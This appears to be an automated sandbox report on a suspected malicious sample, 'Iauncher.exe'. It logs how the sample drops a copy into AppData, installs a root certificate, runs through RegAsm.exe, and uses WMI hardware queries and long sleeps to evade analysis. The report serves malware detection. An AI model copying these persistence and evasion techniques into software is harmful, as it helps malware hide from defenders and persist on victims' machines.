                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Iauncher.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Iauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Iauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB^q source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: Iauncher.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: Yara matchFile source: Iauncher.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Iauncher.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Iauncher.exe PID: 2448, type: MEMORYSTR
                          Source: Iauncher.exeStatic PE information: 0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E000C4 push eax; iretd 0_2_04E000CD
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05CB8940 push esp; ret 0_2_05CB8941
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_07924D0F push esp; retf 0_2_07924D29
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_07924439 push es; ret 0_2_07924430
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_079243B8 push es; ret 0_2_07924430
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F1E350 push E80E755Eh; ret 0_2_09F1E369
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F1272A push eax; ret 0_2_09F12731
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F3E081 pushad ; ret 2_2_00F3E082
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F162BA push ecx; ret 2_2_00F162CD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06020F04 push ebp; retf 4_2_06020F05
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06020DF1 push esi; retf 4_2_06020DF5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0602118F push edx; retf 4_2_06021191
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0604DFD1 push es; ret 4_2_0604DFE6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0604ECF2 push eax; ret 4_2_0604ED01
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06043B4F push dword ptr [esp+ecx*2-75h]; ret 4_2_06043B53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_060449AB push FFFFFF8Bh; retf 4_2_060449AD
                          Source: Iauncher.exeStatic PE information: section name: .text entropy: 7.90237020530487

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeFile created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Iauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exe TID: 7288Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2960E FindFirstFileExW,2_2_00F2960E
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: Iauncher.exe, 00000000.00000002.3515556272.0000000005283000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1984404198.0000000005053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F1AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F1AAD3
